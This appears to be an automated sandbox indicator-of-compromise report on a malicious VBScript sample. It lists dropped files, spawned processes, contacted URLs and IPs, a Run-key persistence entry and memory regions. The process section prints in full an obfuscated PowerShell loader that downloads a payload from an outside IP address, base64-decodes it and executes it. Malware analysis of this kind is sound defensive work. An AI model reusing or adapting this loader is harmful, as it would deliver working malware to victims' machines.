IOC Report
Pedido02304024.vbs

loading gif

Files

File Path
Type
Category
Malicious
Pedido02304024.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_255zdkf4.knj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5irav4cj.1zm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qtasa01.5ge.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lystk3et.uuf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Roaming\ceilometers.Pri
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido02304024.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kildematerialet107 = 1;$Kernevaabnet='Substrin';$Kernevaabnet+='g';Function ciceroner($Bldgringer){$Cholecystogram=$Bldgringer.Length-$Kildematerialet107;For($Brandsituationerne=1; $Brandsituationerne -lt $Cholecystogram; $Brandsituationerne+=(2)){$Categoricalness+=$Bldgringer.$Kernevaabnet.Invoke($Brandsituationerne, $Kildematerialet107);}$Categoricalness;}function Nonsensitizeds($whap){& ($Skimpiness) ($whap);}$Autoindtrks=ciceroner 'PM,o z i l lOaK/,5K. 0 ( W.iAnRd oUw sC NETC ,1S0.. 0M;I W i nu6 4.;W PxS6R4 ;, rRvK: 1 2B1A. 0 )S cG.egcKk oA/ 2E0R1S0 0l1 0Y1T .FTiOr,e,f o.xP/n1s2U1G.,0B ';$Hypsilophodontoid21=ciceroner 'KU.s ePr - A g e,nPt ';$Lydsidernes=ciceroner 'Uh tOtMp,:./ /L8B7 . 1 2 1w..1 0.5R.g1 6U3 /.BFo,lPd,kClUuSbHbSeCn s,. p cKzN ';$jvnhjde=ciceroner ',>, ';$Skimpiness=ciceroner 'AiJeUx, ';$equichangeable='Jynginae';Nonsensitizeds (ciceroner '.S,eRt -BC oMn,tPe nPtM -ZPSa tNh WT :E\SFTeGi ..t xCtU G-,V all,u,eR $AeSq uIipc,hFa nPg eBa b l.e ;M ');Nonsensitizeds (ciceroner ',i.f. E(BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiMt }W; ');$Nutmegged = ciceroner 'QeBc.hSoU %taOp p dSast aT%,\AcbeJi,l.oamEe.t eIr s,.BPBrAiU H&,&. eDc,hDoB $. ';Nonsensitizeds (ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mDdT a/ac $RN uFt.mMe g,gPeFdL)P ');Nonsensitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e sFk r.i vUeVrAsr=F$NLByDdSs i d,eTrInReSs,.Ns.p lLi t ( $Hj.v n hFjLd,e,). ');$Lydsidernes=$Linieskrivers[0];Nonsensitizeds (ciceroner 'T$Og lEo b aUlr: RAe fSe.r eLn c e.v rTkDe rw=PNCe w - O b j.ePcStU .ShyPsPt eNmD. N e.tG.JWEe bFC.lTi e,n t. ');Nonsensitizeds (ciceroner 'U$UR.eKfAe rDe,nsc e,v r.kIe rG.VH e aPd eDr,sO[R$MHRyVpFs iLlAo.pFhIo dGo,n tDo.iIdu2,1O].=.$UA uFt oUi n,d t r.k sL ');$Superrheumatized=ciceroner 'LR.eHfSeFr e,n cte.vBrVkOeVr .IDKo w nPl oNa d F i l.ec( $.LIy,d.sBiIdBeSrSn.e.sD, $.BAe,tTa g.eBtSh,e.dIsG), ';$Superrheumatized=$Conveth[1]+$Superrheumatized;$Betagetheds=$Conveth[0];Nonsensitizeds (ciceroner ' $AgFl o,bBa.l.:MDTvHnKl d.eEnC=I(UTFe s,tR- PMa.t.h $TBPe tSaMgMe tNhKe d s ) ');while (!$Dvnlden) {Nonsensitizeds (ciceroner '.$PgFlToSb aPlS: OSdTiKnSi aNn = $.t r u.eO ') ;Nonsensitizeds $Superrheumatized;Nonsensitizeds (ciceroner ' SWtBa.r.t -TS l.e e pS E4. ');Nonsensitizeds (ciceroner 'B$ g lEo.bCaWl,:,D vBnBlPdBeIn = (RTUe,s,tR- P.aSt ha B$,Bse t aAg e,tDh e.dDsP) ') ;Nonsensitizeds (ciceroner 'D$ gMlQo b,aCln: B.uVs t iDa n =F$RgSl.o bSaDlB:OO uOtSs m o k.e s +A+ % $,L iEn,iae sHkSriiBv eSrMsE.Kc.obuRn t ') ;$Lydsidernes=$Linieskrivers[$Bustian];}Nonsensitizeds (ciceroner 'G$ g l o bua l,: A mFpPhSo.lOyPt e,2,0m4 D=, SG e,t -,C o.n t eSn tS $ BBe.tdaEgEe t h eMd,s. ');Nonsensitizeds (ciceroner 'E$Fg lCoAbUa,lC:HSGtDa mSmAe,r,i nEgFlSyD F=. W[LS y,sWtKeBmT.TCCosn vSeSrAt.]R:G:CFqr oTm,BKa s eS6K4 SRt,r iVnUgS(,$ A,mBpPhJoAl.yItTe 2 0,4 )H ');Nonsensitizeds (ciceroner 'M$Sg l.oAbBa lS:UE pDiBs c o pDi sFeBd I=h O[PS yPsGtHe.m . T.e.xMt .KE nNc oGdNi n g.]C:K:SAgSTCMITIG. G eItGSCt,r,i.nag,(O$ZS.t aUm,mCeUrBi.nIg.lNy )F ');Nonsensitizeds (ciceroner '.$ gFl o.bUa,lD: CFu,rCcSu lMi.o.sC=C$.EBpJi.s,cAo,pPibsTe d .Es.uUb sOt.r i n.gF(A3T2.5 4 3.0s, 2 6.5.5B8U)A ');Nonsensitizeds $Curculios;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
malicious
C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe
"C:\Program Files (x86)\mYXDqyXmxWLxDuVbVtvmThXUcmtSSGYDIkaTJxGswIcwJgbDFXkLoJheiZ\NJtMZOnjgWDVLdkRCPxthGxX.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\ceilometers.Pri && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 4 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.theplays.shop/gnbc/
172.67.152.117
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.theplays.shop/gnbc/?qRm=CFA+HkVxdb5EmOTiyKOWRwF+pLrZo+HX//sAjaoe71zU1jru2C8H4zHuCGW9CrkOmabuxLOltM6mSwZ40cUWhJKDDEbSgCXb2jOP4Eqmg9UuBFGRNSISgVk=&ALLPg=JbKtchOp7P4H8n8
172.67.152.117
malicious
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
unknown
http://www.e-me.lv/repository0
unknown
http://www.acabogacia.org/doc0
unknown
http://crl.chambersign.org/chambersroot.crl0
unknown
http://ocsp.suscerte.gob.ve0
unknown
http://crl.microsoft
unknown
http://www.postsignum.cz/crl/psrootqca2.crl02
unknown
http://crl.dhimyotis.com/certignarootca.crl0
unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
unknown
http://www.chambersign.org1
unknown
http://www.pkioverheid.nl/policies/root-policy0
unknown
http://87.121.105.163/Boldklubbens.pczP
unknown
http://repository.swisssign.com/0
unknown
http://www.suscerte.gob.ve/lcr0#
unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
unknown
http://crl.ssc.lt/root-c/cacrl.crl0
unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0
unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0
unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
unknown
http://www.certplus.com/CRL/class3P.crl0
unknown
http://www.suscerte.gob.ve/dpc0
unknown
http://www.certeurope.fr/reference/root2.crl0
unknown
http://www.certplus.com/CRL/class2.crl0
unknown
http://www.disig.sk/ca/crl/ca_disig.crl0
unknown
http://www.defence.gov.au/pki0
unknown
https://nuget.org/nuget.exe
unknown
http://www.sk.ee/cps/0
unknown
http://www.globaltrust.info0=
unknown
http://www.anf.es
unknown
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.postsignum.cz/crl/psrootqca4.crl02
unknown
http://pki.registradores.org/normativa/index.htm0
unknown
http://policy.camerfirma.com0
unknown
http://www.ssc.lt/cps03
unknown
http://ocsp.pki.gva.es0
unknown
http://www.anf.es/es/address-direccion.html
unknown
https://www.anf.es/address/)1(0&
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
unknown
http://ca.mtin.es/mtin/ocsp0
unknown
http://crl.ssc.lt/root-b/cacrl.crl0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
unknown
http://www.certicamara.com/dpc/0Z
unknown
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
unknown
https://go.micro
unknown
https://wwww.certigna.fr/autorites/0m
unknown
http://www.dnie.es/dpc0
unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://ca.mtin.es/mtin/DPCyPoliticas0
unknown
https://www.anf.es/AC/ANFServerCA.crl0
unknown
https://repository.tsp.zetes.com0
unknown
http://www.globaltrust.info0
unknown
http://certificates.starfieldtech.com/repository/1604
unknown
http://acedicom.edicomgroup.com/doc0
unknown
http://www.certplus.com/CRL/class3TS.crl0
unknown
https://github.com/Pester/Pester
unknown
https://crl.anf.es/AC/ANFServerCA.crl0
unknown
http://www.certeurope.fr/reference/pc-root2.pdf0
unknown
http://ac.economia.gob.mx/last.crl0G
unknown
https://www.catcert.net/verarrel
unknown
http://www.disig.sk/ca0f
unknown
http://87.121.105.163/fBizb192.bin
87.121.105.163
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
unknown
http://www.e-szigno.hu/RootCA.crl
unknown
http://www.sk.ee/juur/crl/0
unknown
http://crl.chambersign.org/chambersignroot.crl0
unknown
http://crl.xrampsecurity.com/XGCA.crl0
unknown
http://certs.oati.net/repository/OATICA2.crl0
unknown
http://crl.oces.trust2408.com/oces.crl0
unknown
http://www.quovadis.bm0
unknown
http://crl.ssc.lt/root-a/cacrl.crl0
unknown
http://certs.oaticerts.com/repository/OATICA2.crl
unknown
http://certs.oati.net/repository/OATICA2.crt0
unknown
http://www.accv.es00
unknown
http://www.pkioverheid.nl/policies/root-policy-G20
unknown
https://www.netlock.net/docs
unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
unknown
http://www.e-trust.be/CPS/QNcerts
unknown
http://ocsp.ncdc.gov.sa0
unknown
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
unknown
http://crl2.postsignum.cz/crl/psrootqca4.crl01
unknown
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
unknown
http://www.datev.de/zertifikat-policy-int0
unknown
https://d.symc0
unknown
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
unknown
https://repository.luxtrust.lu0
unknown
http://cps.chambersign.org/cps/chambersroot.html0
unknown
https://contoso.com/License
unknown
http://www.acabogacia.org0
unknown
http://www.firmaprofesional.com/cps0
unknown
http://www.uce.gub.uy/acrn/acrn.crl0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.tyaer.com
47.91.88.207
malicious
www.theplays.shop
172.67.152.117
malicious
www.megabet303.lol
unknown
malicious
www.oyoing.com
127.0.0.1

IPs

IP
Domain
Country
Malicious
172.67.152.117
www.theplays.shop
United States
malicious
47.91.88.207
www.tyaer.com
United States
malicious
87.121.105.163
unknown
Bulgaria
127.0.0.1
www.oyoing.com
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
UX0H5LZH3DGH
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
62A7000
trusted library allocation
page read and write
malicious
23700000
unclassified section
page execute and read and write
malicious
2ED0000
system
page execute and read and write
malicious
8E80000
direct allocation
page execute and read and write
malicious
860000
trusted library allocation
page read and write
malicious
AC33000
direct allocation
page execute and read and write
malicious
DA0000
trusted library allocation
page read and write
malicious
600000
system
page execute and read and write
malicious
2C00000
unkown
page execute and read and write
malicious
24A90076000
trusted library allocation
page read and write
malicious
4C0000
system
page execute and read and write
malicious
79DE000
stack
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
141000
unkown
page readonly
2200000
unkown
page execute and read and write
1BF5C450000
heap
page read and write
CA1000
heap
page read and write
279AD0CF000
heap
page read and write
518F000
stack
page read and write
613000
heap
page read and write
3400000
heap
page read and write
279AEE23000
heap
page read and write
CC0000
heap
page read and write
CA1000
heap
page read and write
22651000
heap
page read and write
7F8000
heap
page read and write
24AEAD40000
heap
page read and write
279AF0AC000
heap
page read and write
279AEDB2000
heap
page read and write
6EB0000
heap
page readonly
24AEAAF1000
heap
page read and write
45B000
stack
page read and write
279AD012000
heap
page read and write
2C92000
heap
page read and write
6D8787E000
stack
page read and write
279AEF23000
heap
page read and write
279AEDE6000
heap
page read and write
29E0000
heap
page read and write
CA1000
heap
page read and write
DE0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
6EAF000
stack
page read and write
6ED0000
direct allocation
page read and write
2FF0000
heap
page read and write
4EE0000
heap
page read and write
CA1000
heap
page read and write
6F98000
heap
page read and write
279AEDEE000
heap
page read and write
21F00000
direct allocation
page read and write
6E7000
heap
page read and write
279AEDF6000
heap
page read and write
279AEFA3000
heap
page read and write
6553000
remote allocation
page execute and read and write
3170000
heap
page read and write
785E000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
8F80000
direct allocation
page read and write
5D0000
unkown
page read and write
2110000
unkown
page readonly
279AD0A1000
heap
page read and write
279AD0AB000
heap
page read and write
775B000
stack
page read and write
3530000
heap
page read and write
8A40000
trusted library allocation
page read and write
279AF07B000
heap
page read and write
348F000
unkown
page read and write
CA1000
heap
page read and write
2D75000
heap
page read and write
CA1000
heap
page read and write
24A809DD000
trusted library allocation
page read and write
151000
unkown
page execute read
8F60000
direct allocation
page read and write
CA1000
heap
page read and write
2DED000
stack
page read and write
24AECC29000
heap
page read and write
7F0000
heap
page read and write
D8D37FF000
stack
page read and write
279AF084000
heap
page read and write
CA1000
heap
page read and write
279AEE03000
heap
page read and write
24A814EF000
trusted library allocation
page read and write
24AECC39000
heap
page read and write
CA1000
heap
page read and write
21F30000
direct allocation
page read and write
1BA000
stack
page read and write
24AEC477000
heap
page execute and read and write
279AF064000
heap
page read and write
7FFD9B752000
trusted library allocation
page read and write
2DF5000
heap
page read and write
CA1000
heap
page read and write
7CE0000
trusted library allocation
page read and write
6D8757E000
stack
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
7EE0000
trusted library allocation
page read and write
279AEF6D000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
279ACFE0000
heap
page read and write
6001000
trusted library allocation
page read and write
CA1000
heap
page read and write
2979000
stack
page read and write
1BF5DDC0000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
24A80224000
trusted library allocation
page read and write
CA1000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
210F000
stack
page read and write
4842000
unclassified section
page read and write
CA1000
heap
page read and write
4B6E000
stack
page read and write
279ACFC0000
heap
page read and write
7E30000
trusted library allocation
page read and write
78C0000
heap
page read and write
279AEF7E000
heap
page read and write
279AF1B2000
heap
page read and write
CA1000
heap
page read and write
25BF1000
unclassified section
page execute and read and write
6E1000
heap
page read and write
4EBE000
stack
page read and write
344E000
stack
page read and write
35E1000
heap
page read and write
540000
heap
page read and write
24AEC5C0000
heap
page execute and read and write
24AEAA10000
heap
page read and write
44F0000
direct allocation
page execute and read and write
6E10000
heap
page read and write
F0000
unkown
page readonly
7E0000
unkown
page read and write
CA1000
heap
page read and write
4E10000
trusted library allocation
page read and write
63E000
heap
page read and write
7E90000
trusted library allocation
page read and write
840000
heap
page read and write
CAD000
heap
page read and write
6F86000
heap
page read and write
222CE000
stack
page read and write
CA1000
heap
page read and write
769E000
stack
page read and write
24AECC2F000
heap
page read and write
760000
unkown
page read and write
6E17000
heap
page read and write
D8D3AFB000
stack
page read and write
279AD09F000
heap
page read and write
2E90000
direct allocation
page read and write
CA1000
heap
page read and write
1C3B2000
system
page read and write
24AEC9A3000
heap
page read and write
956E7FE000
stack
page read and write
24A809F4000
trusted library allocation
page read and write
7861000
heap
page read and write
279AEF7F000
heap
page read and write
279AD0B1000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
279AF0D5000
heap
page read and write
ECE000
stack
page read and write
279AD05D000
heap
page read and write
80F000
heap
page read and write
24AECA05000
heap
page read and write
6F30000
heap
page read and write
5F0000
heap
page read and write
524000
heap
page read and write
100000
unkown
page readonly
7CF0000
trusted library allocation
page read and write
799D000
stack
page read and write
237745C0000
heap
page read and write
22B4E000
direct allocation
page execute and read and write
24AECA49000
heap
page read and write
CA1000
heap
page read and write
759D000
stack
page read and write
110000
unkown
page readonly
6B9000
heap
page read and write
110000
unkown
page readonly
7C0000
unkown
page readonly
7F00000
trusted library allocation
page read and write
CA1000
heap
page read and write
787A000
heap
page read and write
81B000
heap
page read and write
279AF064000
heap
page read and write
CA1000
heap
page read and write
7FF000
stack
page read and write
279AEF6F000
heap
page read and write
6F98000
heap
page read and write
4FC000
stack
page read and write
4AE9000
stack
page read and write
7F1E000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
6E17000
heap
page read and write
279AEF4A000
heap
page read and write
279AEFA3000
heap
page read and write
1FE4000
heap
page read and write
CA1000
heap
page read and write
279AEE40000
heap
page read and write
279AF2B0000
heap
page read and write
1BF5C4A0000
heap
page read and write
520000
heap
page read and write
89CE000
stack
page read and write
F0000
unkown
page readonly
6B5000
system
page execute and read and write
24AEA8D0000
heap
page read and write
4832000
direct allocation
page execute and read and write
524000
heap
page read and write
279AEE66000
heap
page read and write
279AEFA2000
heap
page read and write
DD0000
heap
page read and write
24AEAB87000
heap
page read and write
CA1000
heap
page read and write
279AF132000
heap
page read and write
24AEAB78000
heap
page read and write
279AEFA2000
heap
page read and write
2E00000
heap
page read and write
2332000
unkown
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
79CF000
stack
page read and write
2DF0000
heap
page read and write
329D000
stack
page read and write
CA1000
heap
page read and write
279AEF7E000
heap
page read and write
6D8844B000
stack
page read and write
6F00000
direct allocation
page read and write
279AEDFB000
heap
page read and write
29F0000
heap
page read and write
24A902F0000
trusted library allocation
page read and write
24AEAD45000
heap
page read and write
279AEF22000
heap
page read and write
279AF0E6000
heap
page read and write
608000
heap
page read and write
4E00000
trusted library section
page read and write
CA1000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2C90000
heap
page read and write
740000
unkown
page read and write
5CE000
stack
page read and write
4F2E000
stack
page read and write
4B3C000
stack
page read and write
22ADD000
direct allocation
page execute and read and write
78CA000
heap
page read and write
6D7000
heap
page read and write
279AEE66000
heap
page read and write
2320000
heap
page read and write
279AEDE1000
heap
page read and write
279AEDC2000
heap
page read and write
3250000
heap
page read and write
CA1000
heap
page read and write
9833000
direct allocation
page execute and read and write
446F000
heap
page read and write
CA1000
heap
page read and write
279AD013000
heap
page read and write
CA1000
heap
page read and write
3520000
heap
page read and write
6D8834D000
stack
page read and write
24AECA0F000
heap
page read and write
24A81ABE000
trusted library allocation
page read and write
279AEF0F000
heap
page read and write
CA1000
heap
page read and write
279AF0AC000
heap
page read and write
212F0680000
heap
page read and write
21F10000
direct allocation
page read and write
